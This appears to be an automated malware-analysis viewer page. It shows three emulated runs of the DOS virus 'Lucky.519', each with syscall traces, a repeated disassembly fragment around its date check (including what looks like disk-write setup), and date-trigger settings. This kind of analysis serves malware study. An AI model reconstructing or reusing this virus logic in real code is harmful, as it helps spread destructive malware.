Sample viewer

vx.netlux.org/Virus.DOS.Lucky.519

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:08:13.006477732Z 42 PC: 12b8b | Get date 0x12b8b: cmp dl, 8
0x12b8e: jne 0x12b93
0x12b90: call 0x12ba1
0x12b93: jmp 0x12a47
0x12b96: lodsw ax, word ptr [si]
0x12b97: jae 0x12b9d
0x12b99: stosw word ptr es:[di], ax
0x12b9a: loop 0x12b96
0x12b9c: ret
0x12b9d: xor ax, 0xf973
0x12ba0: ret
0x12ba1: dec si
0x12ba2: call 0x12bca
0x12ba5: push dx
0x12ba6: call 0x22b96
0x12ba9: mov bh, 0x7c
0x12bab: mov word ptr es:[bx + 0x29], si
0x12baf: mov ax, 0x301
0x12bb2: mov cx, 1
0x12bb5: mov dh, ch
2018-12-17T23:08:13.009349294Z 47 PC: 12a71 | Get disk transfer address
2018-12-17T23:08:13.011495732Z 26 PC: 12a88 | Set disk transfer address
2018-12-17T23:08:13.013044669Z 78 PC: 12a98 | Find first file
2018-12-17T23:08:13.019733225Z 26 PC: 12b76 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16127,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:25.570125531Z 42 PC: 12b8b | Get date 0x12b8b: cmp dl, 8
0x12b8e: jne 0x12b93
0x12b90: call 0x12ba1
0x12b93: jmp 0x12a47
0x12b96: lodsw ax, word ptr [si]
0x12b97: jae 0x12b9d
0x12b99: stosw word ptr es:[di], ax
0x12b9a: loop 0x12b96
0x12b9c: ret
0x12b9d: xor ax, 0xf973
0x12ba0: ret
0x12ba1: dec si
0x12ba2: call 0x12bca
0x12ba5: push dx
0x12ba6: call 0x22b96
0x12ba9: mov bh, 0x7c
0x12bab: mov word ptr es:[bx + 0x29], si
0x12baf: mov ax, 0x301
0x12bb2: mov cx, 1
0x12bb5: mov dh, ch
2018-12-25T12:45:25.573113671Z 47 PC: 12a71 | Get disk transfer address
2018-12-25T12:45:25.574338982Z 26 PC: 12a88 | Set disk transfer address
2018-12-25T12:45:25.575753312Z 78 PC: 12a98 | Find first file
2018-12-25T12:45:25.582724219Z 26 PC: 12b76 | Set disk transfer address

{"DateBased":true,"Day":8,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16127,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:25.842723242Z 42 PC: 12b8b | Get date 0x12b8b: cmp dl, 8
0x12b8e: jne 0x12b93
0x12b90: call 0x12ba1
0x12b93: jmp 0x12a47
0x12b96: lodsw ax, word ptr [si]
0x12b97: jae 0x12b9d
0x12b99: stosw word ptr es:[di], ax
0x12b9a: loop 0x12b96
0x12b9c: ret
0x12b9d: xor ax, 0xf973
0x12ba0: ret
0x12ba1: dec si
0x12ba2: call 0x12bca
0x12ba5: push dx
0x12ba6: call 0x22b96
0x12ba9: mov bh, 0x7c
0x12bab: mov word ptr es:[bx + 0x29], si
0x12baf: mov ax, 0x301
0x12bb2: mov cx, 1
0x12bb5: mov dh, ch
2018-12-25T12:45:25.847491031Z 47 PC: 12a71 | Get disk transfer address
2018-12-25T12:45:25.848508552Z 26 PC: 12a88 | Set disk transfer address
2018-12-25T12:45:25.849530769Z 78 PC: 12a98 | Find first file
2018-12-25T12:45:25.855603916Z 26 PC: 12b76 | Set disk transfer address
2018-12-25T12:45:25.856743153Z 9 PC: 12941 | Display string (Could not find end pointer)